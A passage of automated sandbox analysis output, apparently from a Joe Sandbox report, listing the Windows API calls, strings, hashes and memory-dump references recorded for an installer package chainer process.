                                          • GetFileVersionInfoSizeW.VERSION(?,00000000,Shlwapi.dll,D11C52E5,00000000,?,?,?,?,00000000,000F3AC5,000000FF,Shlwapi.dll,0008D246,?), ref: 0008D2DD
                                          • GetFileVersionInfoW.VERSION(?,00000000,000F3AC5,?,00000000,?,?,00000000,000F3AC5,000000FF,Shlwapi.dll,0008D246,?), ref: 0008D309
                                          • VerQueryValueW.VERSION(?,0010C404,000000FF,?,?,?,00000000,000F3AC5,000000FF,Shlwapi.dll,0008D246,?), ref: 0008D321
                                          • GetLastError.KERNEL32(?,?,00000000,000F3AC5,000000FF,Shlwapi.dll,0008D246,?), ref: 0008D34E
                                          • DeleteFileW.KERNEL32(?), ref: 0008D361
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: File$InfoVersion$DeleteErrorFolderLastPathQuerySizeValue
                                          • String ID: Shlwapi.dll$p1Wu
                                          • API String ID: 1753006064-65368398
                                          • Opcode ID: 2a4365ad3081ab078e136752583a7beb82ec883c8994ac6d2dfcf37fa4de4575
                                          • Instruction ID: d21623896b83ee2ea72545354afd30b22d216e8efe7e99fbe8fcd7f4a6b5f7fc
                                          • Opcode Fuzzy Hash: 2a4365ad3081ab078e136752583a7beb82ec883c8994ac6d2dfcf37fa4de4575
                                          • Instruction Fuzzy Hash: 51315EB1900249EBDB11DFA5DD44BEEBBF8FF08710F14426AE845A3291DB349B44CBA5
                                          APIs
                                          • GetErrorInfo.OLEAUT32(00000000,00000000,D11C52E5,?,?), ref: 0007457C
                                          • SysStringLen.OLEAUT32(00000000), ref: 0007465F
                                          • GetProcessHeap.KERNEL32(-000000FF,?), ref: 000746A8
                                          • HeapFree.KERNEL32(00000000,-000000FF,?), ref: 000746AE
                                          • GetProcessHeap.KERNEL32(-000000FF,00000000,?,00000000,00000000,00000000,D11C52E5,?,?), ref: 000746DB
                                          • HeapFree.KERNEL32(00000000,-000000FF,00000000,?,00000000,00000000,00000000,D11C52E5,?,?), ref: 000746E1
                                          • SysFreeString.OLEAUT32(00000000), ref: 000746F9
                                          • SetErrorInfo.OLEAUT32(00000000,00000000,?), ref: 000747A6
                                            • Part of subcall function 00074040: GetProcessHeap.KERNEL32(00074793,00074793), ref: 0007417D
                                            • Part of subcall function 00074040: HeapFree.KERNEL32(00000000,00074793,00074793), ref: 00074183
                                            • Part of subcall function 00074040: GetProcessHeap.KERNEL32(00074694,?), ref: 000741B7
                                            • Part of subcall function 00074040: HeapFree.KERNEL32(00000000,00074694,?), ref: 000741BD
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Heap$Free$Process$ErrorInfoString
                                          • String ID:
                                          • API String ID: 976288773-0
                                          • Opcode ID: 1a67eb6d64b82bb204aa7a6cd9006c7a6eb8cffec81057dd5354f3bde1067aea
                                          • Instruction ID: d75522f2233efdd28357f761eb40d3374ad92248f01342237d4fd88682efa86e
                                          • Opcode Fuzzy Hash: 1a67eb6d64b82bb204aa7a6cd9006c7a6eb8cffec81057dd5354f3bde1067aea
                                          • Instruction Fuzzy Hash: 9A919070D04249DBDB14DFA8C945BEEBBF8EF05310F148159E818AB2D2DB789E04CBA5
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,000CA422), ref: 000CA29C
                                          • HeapAlloc.KERNEL32(00000000,?,000CA422), ref: 000CA2A3
                                            • Part of subcall function 000CA36E: IsProcessorFeaturePresent.KERNEL32(0000000C,000CA28A,00000000,?,000CA422), ref: 000CA370
                                          • InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,000CA422), ref: 000CA2B3
                                          • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,000CA422), ref: 000CA2DA
                                          • RaiseException.KERNEL32(C0000017,00000000,00000000,00000000,?,000CA422), ref: 000CA2EE
                                          • InterlockedPopEntrySList.KERNEL32(00000000,?,000CA422), ref: 000CA301
                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,000CA422), ref: 000CA314
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
                                          • String ID:
                                          • API String ID: 2460949444-0
                                          • Opcode ID: 823b3a2411be797495e316391a753d35b71efa8b829da72ab5e2186e59520cc3
                                          • Instruction ID: 70ee411afd36fc5e4c1c59488dce0154661d9095fd1053688fee60ddbe030b76
                                          • Opcode Fuzzy Hash: 823b3a2411be797495e316391a753d35b71efa8b829da72ab5e2186e59520cc3
                                          • Instruction Fuzzy Hash: 201134317052A9BBFB310B68EC08F7E769DEB06789F200428FA01D6570DA25CC81D7A2
                                          APIs
                                            • Part of subcall function 0007FCC0: CharNextW.USER32(?,00000000,00000000,7556F360,?,000808FF,00000000,00000000,?,?,?,00000000,00000000,00080BA3,?,?), ref: 0007FCFB
                                            • Part of subcall function 0007FCC0: CharNextW.USER32(00000001,?,00000000,00000000,7556F360,?,000808FF,00000000,00000000,?,?,?,00000000,00000000,00080BA3,?), ref: 0007FD1B
                                            • Part of subcall function 0007FCC0: CharNextW.USER32(00000000,?,00000000,00000000,7556F360,?,000808FF,00000000,00000000,?,?,?,00000000,00000000,00080BA3,?), ref: 0007FD2B
                                            • Part of subcall function 0007FCC0: CharNextW.USER32(00000027,?,00000000,00000000,7556F360,?,000808FF,00000000,00000000,?,?,?,00000000,00000000,00080BA3,?), ref: 0007FD34
                                            • Part of subcall function 0007FCC0: CharNextW.USER32(?,?,00000000,00000000,7556F360,?,000808FF,00000000,00000000,?,?,?,00000000,00000000,00080BA3,?), ref: 0007FDA0
                                          • lstrcmpiW.KERNEL32(?,0010D51C,?,D11C52E5,?,00000000,00000000), ref: 0007F477
                                          • lstrcmpiW.KERNEL32(?,0010C41C), ref: 0007F48E
                                          • VarUI4FromStr.OLEAUT32(?,00000000,00000000,?), ref: 0007F6E4
                                          • CharNextW.USER32(?,?), ref: 0007F7D5
                                          • CharNextW.USER32(00000000), ref: 0007F7EB
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: CharNext$lstrcmpi$From
                                          • String ID:
                                          • API String ID: 298784196-0
                                          • Opcode ID: 607ff9bac9259f78a484bae24571d5d863968b6ee4ebd7603feae2f134a8d3e1
                                          • Instruction ID: 3e02748a4998f4f504445b660583f25394875ee52d2d01c5194bb105627f159c
                                          • Opcode Fuzzy Hash: 607ff9bac9259f78a484bae24571d5d863968b6ee4ebd7603feae2f134a8d3e1
                                          • Instruction Fuzzy Hash: 8ED1BD71D0024ADBDB74DF64CC84BFE77B4AB08300F108179E959AB291EB78AA45CB59
                                          APIs
                                          • SymGetLineFromAddr.DBGHELP(?,?,?,00000002,D11C52E5), ref: 0008A45E
                                            • Part of subcall function 00089E10: LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr), ref: 00089E6E
                                            • Part of subcall function 00089E10: GetProcAddress.KERNEL32(00000000), ref: 00089E75
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: AddrAddressFromLibraryLineLoadProc
                                          • String ID: -> $%hs()$%hs:%ld$-----$[0x%.8Ix]
                                          • API String ID: 2196328783-2864510326
                                          • Opcode ID: 14efafdd23e0ebf8e92090891bafe56d793e59bbbc03977c12b447ac230c26d8
                                          • Instruction ID: 419c2040dd5b3d0e43d450088ee725f70d0dee906fd9a52756889783289c06f6
                                          • Opcode Fuzzy Hash: 14efafdd23e0ebf8e92090891bafe56d793e59bbbc03977c12b447ac230c26d8
                                          • Instruction Fuzzy Hash: 7CE19D70D002689AEB24DF64CC98BDEB7B5FF45314F1042DAE509A7681DBB85B84CF91
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,00000080,00000001,Close,50000001,?,00000128,?,00000032,0000000E,00000082,000001F5,?,50000000,?,00000026), ref: 0008E78B
                                          • DialogBoxIndirectParamW.USER32(00000000,00000000,?,0008E8D0,?), ref: 0008E7DA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: DialogHandleIndirectModuleParam
                                          • String ID: Close$Copy$Details >>$Send Error Report
                                          • API String ID: 279259766-113472931
                                          • Opcode ID: 149eb465d3494d6b881d5c2130ad1314437f27b0ca482edd543acdcd7b2fb8f6
                                          • Instruction ID: 3581514ffa5eee13a93a8919e58344ad8221b168be05a6e7a5c8e35a9cd56eb7
                                          • Opcode Fuzzy Hash: 149eb465d3494d6b881d5c2130ad1314437f27b0ca482edd543acdcd7b2fb8f6
                                          • Instruction Fuzzy Hash: D4C1AC70A40645EBEB24DF64CC56BEEB7B5FF08714F104229F551AB2C1EBB0AA01CB90
                                          APIs
                                          • _wcsrchr.LIBVCRUNTIME ref: 000A6964
                                            • Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925
                                          • DeleteFileW.KERNEL32(?), ref: 000A6A09
                                          • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 000A6B3C
                                            • Part of subcall function 00086B20: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,D11C52E5,00000001,7568EB20,00000000), ref: 00086B6F
                                            • Part of subcall function 00086B20: ReadFile.KERNEL32(00000000,?,000003FF,?,00000000,?,80000000,00000003,00000000,00000003,00000080,00000000,D11C52E5,00000001,7568EB20,00000000), ref: 00086BA0
                                            • Part of subcall function 00087AB0: LoadStringW.USER32(000000F5,?,00000514,D11C52E5), ref: 00087B06
                                          • _wcsrchr.LIBVCRUNTIME ref: 000A6A78
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: File$Delete_wcsrchr$CreateHeapLoadProcessReadString
                                          • String ID: --verbose --log-file="%s" --remove-pack-file "%s" "%s"$p1Wu
                                          • API String ID: 2917987377-1893047046
                                          • Opcode ID: 483e32bb7e197249d1af9f77790bc2b748d1d74df739b9abae155860a3fb5319
                                          • Instruction ID: bc0ac50bd091784467f6c5a9d0986e6f649fe51f35a6c5df88a6c17372ec361a
                                          • Opcode Fuzzy Hash: 483e32bb7e197249d1af9f77790bc2b748d1d74df739b9abae155860a3fb5319
                                          • Instruction Fuzzy Hash: 1E91A171A006499FDB00DFA8C844B9EBBF5FF55324F1882A9E415DB2A2DB35DD04CBA1
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000000FF,D11C52E5), ref: 000A5EF4
                                            • Part of subcall function 000840A0: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,?,?,?,0009124D,0010ED54,?,?,?,?,00000000), ref: 000840B8
                                            • Part of subcall function 000840A0: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,D11C52E5,-00000001,?,?,?,0009124D,0010ED54,?,?,?,?,00000000), ref: 000840EA
                                            • Part of subcall function 00063590: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,D11C52E5,00000000,000EBD60,000000FF,?,?,00123D80,?,0009D98C,80004005,D11C52E5,?,00000000), ref: 000635DA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$AllocateHeapObjectSingleWait
                                          • String ID: 2Wup1Wu$*.*$.jar$.pack$p2Wu3Wu
                                          • API String ID: 2019434529-3473399590
                                          • Opcode ID: 7b1e39d54c74ad7fe30725236e3c9d0f862a40b7d2216b93a23f36cd221de1f9
                                          • Instruction ID: 40cd933b6212bf8f91a184f80f718ba5aa00a1e55072f843e032c914784a88db
                                          • Opcode Fuzzy Hash: 7b1e39d54c74ad7fe30725236e3c9d0f862a40b7d2216b93a23f36cd221de1f9
                                          • Instruction Fuzzy Hash: 2E517D70A00A4ADFDB10DFA9C948BAEF7F4FF05325F144269E425AB292DB35D944CB90
                                          APIs
                                          • GetActiveWindow.USER32 ref: 000A99ED
                                          • GetForegroundWindow.USER32 ref: 000A99F9
                                          • SetLastError.KERNEL32(0000000E,?,?,?,D11C52E5), ref: 000A9A40
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Window$ActiveErrorForegroundLast
                                          • String ID:
                                          • API String ID: 1822391280-0
                                          • Opcode ID: 5eaccc3291b9d6155aa3e0d6bce59932de66f1ae754f88d91dfb809795b2661b
                                          • Instruction ID: 126db74e3e469da440b1fd0205980c5bf751e75f7f3a592dc6c16e16669c3d3e
                                          • Opcode Fuzzy Hash: 5eaccc3291b9d6155aa3e0d6bce59932de66f1ae754f88d91dfb809795b2661b
                                          • Instruction Fuzzy Hash: 1841F532904249EFDB11CFA4DC44BDEBBB8FF16310F10822AE801A7691DB75A904CBD1
                                          APIs
                                          • _ValidateLocalCookies.LIBCMT ref: 000CE157
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 000CE15F
                                          • _ValidateLocalCookies.LIBCMT ref: 000CE1E8
                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 000CE213
                                          • _ValidateLocalCookies.LIBCMT ref: 000CE268
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                          • String ID: csm
                                          • API String ID: 1170836740-1018135373
                                          • Opcode ID: e0a965a1dfb33d21266c636e568a3a3afa0710f7b619de2db3bd9cf431596cad
                                          • Instruction ID: f4078b0d678b88379d7a7214f7d5ba042689589bc4d5e27c4b80a289afbdb2ab
                                          • Opcode Fuzzy Hash: e0a965a1dfb33d21266c636e568a3a3afa0710f7b619de2db3bd9cf431596cad
                                          • Instruction Fuzzy Hash: 5F41B134A00299ABCF10DFA8C884BEE7BE5AF05314F148169FD149B392C731AA65CB91
                                          APIs
                                          • CallWindowProcW.USER32(?,?,?,?,00000024), ref: 000A9160
                                          • GetWindowLongW.USER32(?,000000FC), ref: 000A9175
                                          • CallWindowProcW.USER32(?,?,00000082,?,00000024), ref: 000A918B
                                          • GetWindowLongW.USER32(?,000000FC), ref: 000A91A5
                                          • SetWindowLongW.USER32(?,000000FC,?), ref: 000A91B5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Window$Long$CallProc
                                          • String ID: $
                                          • API String ID: 513923721-3993045852
                                          • Opcode ID: 15e1636e64103bec3afc771b1e5f87fc9a47a6aeb353c6941572f0e86ffd3a8f
                                          • Instruction ID: 221ee81a20b743d70a5b608f57dcbd0ff881a91d2f2418e6e822c6420e1ce30d
                                          • Opcode Fuzzy Hash: 15e1636e64103bec3afc771b1e5f87fc9a47a6aeb353c6941572f0e86ffd3a8f
                                          • Instruction Fuzzy Hash: DB411271608740AFD760DF59C888A1BBBF5FF89720F504A1DF596836A0C772E944CB92
                                          APIs
                                          • LoadLibraryW.KERNEL32(Shlwapi.dll,?,00000000,?,?,?,?,?,?,000905D4,?), ref: 0008D1CB
                                          • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 0008D1E1
                                          • FreeLibrary.KERNEL32(00000000), ref: 0008D21A
                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,000905D4,?), ref: 0008D236
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Library$Free$AddressLoadProc
                                          • String ID: DllGetVersion$Shlwapi.dll
                                          • API String ID: 1386263645-2240825258
                                          • Opcode ID: 972150275b81bbe7091e85b92633375ae1ff032d956006bf9397a3216b161d1f
                                          • Instruction ID: bb4f62e70e8e4dcc57bad73fc93cc40b6bfa630992d5444f2b17f91697d54cf1
                                          • Opcode Fuzzy Hash: 972150275b81bbe7091e85b92633375ae1ff032d956006bf9397a3216b161d1f
                                          • Instruction Fuzzy Hash: 2F2192726043158BD304AF29E881A7BB7E4BFE9711F80066EF489C7251EB35D84487A3
                                          APIs
                                          • ResetEvent.KERNEL32(?), ref: 000C5D54
                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 000C5D64
                                          • GetLastError.KERNEL32 ref: 000C5D74
                                          • CloseHandle.KERNEL32(?), ref: 000C5D9A
                                          • GetLastError.KERNEL32 ref: 000C5DA4
                                          • CreateSemaphoreW.KERNEL32(00000000,00000000,00000003,00000000), ref: 000C5DC5
                                          • GetLastError.KERNEL32 ref: 000C5DD2
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ErrorLast$CreateEvent$CloseHandleResetSemaphore
                                          • String ID:
                                          • API String ID: 3310109588-0
                                          • Opcode ID: a1567ef913e73cffd40f2e809fecf594def0eafa8f6a0a334ca1a808252df65a
                                          • Instruction ID: ec69b1ae8f3c106d920884e13e0747995aca7318d95f4521baf5ae55ea5fde6f
                                          • Opcode Fuzzy Hash: a1567ef913e73cffd40f2e809fecf594def0eafa8f6a0a334ca1a808252df65a
                                          • Instruction Fuzzy Hash: 33213E74300B029BFB745F65DC58B6A77E8AF44746F10442CE956DA690E7B4F8809B60
                                          APIs
                                          • FreeLibrary.KERNEL32(00000000,?,000DDA64,D11C52E5,0009D001,00000000,00000000,00000000,?,000DDCAF,00000021,FlsSetValue,00102A8C,00102A94,00000000), ref: 000DDA18
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID: api-ms-$ext-ms-
                                          • API String ID: 3664257935-537541572
                                          • Opcode ID: 611f35cbe837d12b6389be77cdb4055d70ddb03413c67cc01236ba6e61d77ba5
                                          • Instruction ID: b4343c313afc0e4da7fca77cedf89a574191ca039fab715ba81b9737f6e7d84f
                                          • Opcode Fuzzy Hash: 611f35cbe837d12b6389be77cdb4055d70ddb03413c67cc01236ba6e61d77ba5
                                          • Instruction Fuzzy Hash: 93210535A01350ABD7719B28EC51A6A7799AF41770F240223E905A73D0DB74EE41C6F1
                                          APIs
                                          • __alloca_probe_16.LIBCMT ref: 000C8F5A
                                            • Part of subcall function 000C7DB0: WaitForSingleObject.KERNEL32(?,000000FF), ref: 000C7E0F
                                            • Part of subcall function 000C7DB0: GetLastError.KERNEL32 ref: 000C7E1A
                                          • SetEvent.KERNEL32(?,?,7556E010,?,?,75573080,000C9311,?), ref: 000C8F8A
                                          • GetLastError.KERNEL32(?,75573080,000C9311,?), ref: 000C8F9A
                                          • SetEvent.KERNEL32(?,?,75573080,000C9311,?), ref: 000C8FA2
                                          • GetLastError.KERNEL32(?,75573080,000C9311,?), ref: 000C8FAC
                                          • EnterCriticalSection.KERNEL32(?,?,75573080,000C9311,?), ref: 000C8FC6
                                          • LeaveCriticalSection.KERNEL32(?,?,75573080,000C9311,?), ref: 000C8FE2
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ErrorLast$CriticalEventSection$EnterLeaveObjectSingleWait__alloca_probe_16
                                          • String ID:
                                          • API String ID: 2730365815-0
                                          • Opcode ID: 174ced3b7996a2a5a28c8e5b3565b48d1a35c382cc4b6193f3d25c93e5a469ca
                                          • Instruction ID: 7ecd2809078b176ccee8dde3f3358413730f2a4cd3e0b1925624b02ab9e45184
                                          • Opcode Fuzzy Hash: 174ced3b7996a2a5a28c8e5b3565b48d1a35c382cc4b6193f3d25c93e5a469ca
                                          • Instruction Fuzzy Hash: 08113D716007049BE720DF69D844FAFB7EAFF58710F00492DEA5AC3611DB34A801DB65
                                          APIs
                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,000C9BF8,000C9B5B,000C9DFC), ref: 000C9B94
                                          • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 000C9BAA
                                          • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 000C9BBF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
